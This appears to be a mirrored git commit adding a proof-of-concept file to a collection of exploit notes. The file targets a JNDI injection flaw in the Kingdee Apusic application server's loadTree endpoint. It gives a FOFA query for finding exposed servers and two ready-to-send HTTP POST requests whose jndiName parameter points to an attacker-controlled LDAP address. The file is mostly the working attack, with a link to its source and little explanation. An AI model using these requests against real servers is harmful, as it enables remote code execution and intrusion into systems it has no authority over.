mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
This commit is contained in:
parent
14640075f4
commit
b13e255ae4
28
金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
Normal file
28
金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
Normal file
@ -0,0 +1,28 @@
|
|||||||
|
## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="Apusic应用服务器"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
POST /appmonitor/protect/jndi/loadTree HTTP/1.1
|
||||||
|
host:127.0.0.1
|
||||||
|
|
||||||
|
jndiName==ldap://地址
|
||||||
|
|
||||||
|
POST /admin/protect/jndi/loadTree HTTP/1.1
|
||||||
|
host:127.0.0.1
|
||||||
|
|
||||||
|
jndiName==ldap://地址
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
##漏洞来源
|
||||||
|
- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw
|
||||||
Loading…
x
Reference in New Issue
Block a user